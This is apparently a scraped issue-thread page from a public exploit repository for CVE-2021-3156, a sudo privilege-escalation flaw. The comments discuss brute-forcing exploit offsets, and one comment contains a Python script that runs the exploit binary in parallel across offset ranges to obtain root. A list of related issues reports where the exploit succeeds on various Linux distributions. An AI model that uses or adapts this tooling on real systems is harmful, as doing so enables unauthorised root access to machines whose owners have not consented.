Comments (3)
The main
branch now has some small wrapper script to try multi-threaded bruting (instructions in README)
from cve-2021-3156.
Hi,
I've just pushed #9 that allow manual definition of offsets from args,
this way you can do a "dumb" bruteforce by doing somethink like the python code below.
don't expect great result cause finding correct offset usually takes some trial and error
from multiprocessing import Pool
import itertools
import subprocess
def fuzz(a):
w,x,y,z = a
try:
print("calling with {} {} {} {}".format(w,x,y,z))
out = subprocess.check_output("./sudo-hax-me-a-sandwich {} {} {} {} 2>&1".format(w,x,y,z), shell=True)
except subprocess.CalledProcessError as e:
out = str(e)
pass
return out
if __name__ == '__main__':
with Pool(5) as p:
print(p.map(fuzz, itertools.product(range(40,70), range(40,70), range(50,70), range(200,220))))
from cve-2021-3156.
Yesterday I made one bruteforcing thingy myself, though I also used custom lib that would exit()
with distinct return code so I can exactly pin point which params/smash lengths get the pwn.
As I see you guys have already picked up on bruteforcing, my script isn't doing multiprocessing (it should) but hey it works.
Just saying it's there.
@TheZ3ro I see you have already noticed, I am planning to do parallelization (probably with asyncio as you can simply spawn bunch of the processes with timeouts and pick up on their statuses after, should work afaik).
from cve-2021-3156.
Related Issues (20)
- Not working on my focal HOT 13
- Debian9 stretch HOT 1
- wen i type ./hax.c my machine does not root all servers on subnet HOT 1
- Ubuntu 16.04 GLIBC 2.23 HOT 3
- Brute script without GNU Parallel HOT 1
- Centos 6.10 version is not adapted HOT 5
- Doesn't work on mac...
- [request] Suse linux 12 or 15
- Centos is safe even if sudo is vulnerable HOT 3
- Move from tcache to fastbins abuse HOT 3
- more targets HOT 3
- writeup explaining alternative technique for older glibc
- Variable question
- PoC not working on a vulnerable Debian 10
- Ubuntu 12.04
- Exploit fails on Debian cloud image HOT 6
- RHEL HOT 2
- Easier approach to exploit sudo 1.9.4 and later versions (ineffective NO_ROOT_MAILER bug) HOT 2
- Exploited successfully on Ubuntu 18.04, libc 2.27, sudo 1.8.21p2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from cve-2021-3156.